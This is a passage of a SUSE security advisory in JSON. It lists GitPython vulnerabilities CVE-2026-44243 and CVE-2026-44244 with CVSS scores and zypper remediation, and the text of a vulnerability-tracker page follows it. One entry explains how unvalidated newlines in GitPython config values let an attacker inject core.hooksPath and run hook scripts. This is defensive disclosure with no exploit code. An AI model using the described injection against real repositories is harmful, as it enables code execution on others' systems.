"summary": "CVE-2026-44243",
"url": "https://www.suse.com/security/cve/CVE-2026-44243"
},
{
"category": "external",
"summary": "SUSE Bug 1264606 for CVE-2026-44243",
"url": "https://bugzilla.suse.com/1264606"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:python313-GitPython-3.1.44-160000.3.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:python313-GitPython-3.1.44-160000.3.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:python313-GitPython-3.1.44-160000.3.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:python313-GitPython-3.1.44-160000.3.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-18T09:43:07Z",
"details": "moderate"
}
],
"title": "CVE-2026-44243"
},
{
"cve": "CVE-2026-44244",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-44244"
}
],
"notes": [
{
"category": "general",
"text": "GitPython is a python library used to interact with Git repositories. Prior to version 3.1.49, GitConfigParser.set_value() passes values to Python\u0027s configparser without validating for newlines. GitPython\u0027s own _write() converts embedded newlines into indented continuation lines (e.g. \\n becomes \\n\\t), but Git still accepts an indented [core] stanza as a section header - so the injected core.hooksPath becomes effective configuration. Any Git operation that invokes hooks (commit, merge, checkout) will then execute scripts from the attacker-controlled path. This issue has been patched in version 3.1.49.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:python313-GitPython-3.1.44-160000.3.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:python313-GitPython-3.1.44-160000.3.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-44244",
"url": "https://www.suse.com/security/cve/CVE-2026-44244"
},
{
"category": "external",
"summary": "SUSE Bug 1264608 for CVE-2026-44244",
"url": "https://bugzilla.suse.com/1264608"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:python313-GitPython-3.1.44-160000.3.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:python313-GitPython-3.1.44-160000.3.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:python313-GitPython-3.1.44-160000.3.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:python313-GitPython-3.1.44-160000.3.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-18T09:43:07Z",
"details": "important"
}
],
"title": "CVE-2026-44244"
}
]
}
Loading…
Trend slope:
-
(linear fit over daily sighting counts)
Show additional events:
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…